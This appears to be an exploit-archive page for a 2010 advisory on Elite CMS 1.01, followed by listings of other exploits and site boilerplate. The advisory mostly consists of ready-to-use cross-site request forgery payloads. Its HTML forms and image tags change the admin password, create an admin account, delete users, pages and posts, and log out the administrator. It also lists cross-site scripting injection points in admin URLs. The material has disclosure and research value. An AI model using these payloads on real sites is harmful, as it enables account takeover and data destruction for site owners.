Menu

Search for hundreds of thousands of exploits

"Elite CMS 1.01 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities"

Author

Exploit author

10n1z3d

Platform

Exploit platform

php

Release date

Exploit published date

2010-07-10

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
# Name: Elite CMS 1.01 Multiple XSS/CSRF Vulnerabilities
# Author: 10n1z3d <10n1z3d[at]w[dot]cn>
# Date: Sat 10 Jul 2010 08:05:44 PM EEST 
# Vendor: http://elitecms.net/
# Download: http://elitecms.net/download.php?download=eliteCMS

-=[ CSRF PoC 1 - Change Admin Password ]=-

    <html>
        <head>
            <title>Elite CMS 1.01 Multiple XSS/CSRF Vulnerabilities - Change Admin Password</title>
        </head>
        <body>
                <!--- Edit these --->
            <form action="http://[domain]/admin/edit_user.php?user=1" method="post">
                <input type="hidden" name="password" value="pwned" />
                <input type="hidden" name="email" value="pwn@pwned.com" />
                <input type="hidden" name="first_name" value="pwned" />
                <!--- Do not edit below --->
                <input type="hidden" name="s_admin" value="1" />
                <input type="hidden" name="active" value="1" />
                <!--- At least they check this --->
                <input type="submit" name="submit" value="Continue" />
            </form>
        </body>
    </html>

-=[ CSRF PoC 2 - Create Admin User ]=-

    <html>
        <head>
            <title>Elite CMS 1.01 Multiple XSS/CSRF Vulnerabilities - Create Admin User</title>
        </head>
        <body>
                <!--- Edit these --->
            <form action="http://[domain]/admin/new_user.php" method="post">
                <input type="hidden" name="user_name" value="root" />
                <input type="hidden" name="password" value="root" />
                <input type="hidden" name="email" value="root@root.com"/>
                <input type="hidden" name="first_name" value="root"/>
                <!--- Do not edit below --->
                <input type="hidden" name="s_admin" value="1" />
                <input type="hidden" name="active" value="1" />
                <!--- At least they check this --->
                <input type="submit" name="submit" value="Continue" />
            </form>
        </body>
    </html>

-=[ CSRF PoC 3 - Delete User ]=-

    <img src="http://[domain]/admin/delete_user.php?user=2" alt="Do you see this?" />

-=[ CSRF PoC 4 - Delete Page ]=-

    <img src="http://[domain]/admin/delete_page.php?page=1" alt="Do you see this?" />

-=[ CSRF PoC 5 - Delete Post ]=-

    <img src="http://[domain]/admin/delete_post.php?post=1" alt="Do you see this?" />

-=[ CSRF PoC 6 - Logout The Administrator ]=-

    <img src="http://[domain]/admin/logout.php" alt="Do you see this?" />

-=[ XSS ]=-

    http://[domain]/admin/edit_page.php?page=1[XSS]
    http://[domain]/admin/edit_post.php?page=1[XSS]
    http://[domain]/admin/add_post.php?page=1[XSS]

Also all of the text fields in the administration panel accept xss code.


Not so l33t huh?
Visit us at http://www.evilzone.org/.
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2010-08-26 "Hycus CMS 1.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-08-15 "Zomplog 3.9 - Cross-Site Scripting / Cross-Site Request Forgery" webapps php 10n1z3d
2010-08-15 "Zomplog 3.9 - 'message' Cross-Site Scripting" webapps php 10n1z3d
2010-07-15 "eXtreme Message Board 1.9.11 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-07-14 "ZenPhoto CMS 1.3 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-07-13 "Diferior CMS 8.03 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-07-12 "Grafik CMS 1.1.2 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-07-12 "TheHostingTool 1.2.2 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-07-12 "Getsimple CMS 2.01 - Multiple Vulnerabilities" webapps php 10n1z3d
2010-07-12 "Campsite CMS 3.4.0 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-07-11 "Macs CMS 1.1.4 - Cross-Site Scripting / Cross-Site Request Forgery" webapps php 10n1z3d
2010-07-11 "TomatoCMS 2.0.5 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-07-11 "Frog CMS 0.9.5 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-07-11 "Orbis CMS 1.0.2 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-07-11 "TomatoCart 1.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-07-11 "Mac's CMS 1.1.4 - 'SearchString' Cross-Site Scripting" webapps java 10n1z3d
2010-07-10 "eliteCMS 1.01 - Multiple Cross-Site Scripting Vulnerabilities" webapps php 10n1z3d
2010-07-10 "Elite CMS 1.01 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities" webapps php 10n1z3d
2010-02-15 "superengine CMS (Custom Pack) - SQL Injection" webapps php 10n1z3d
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.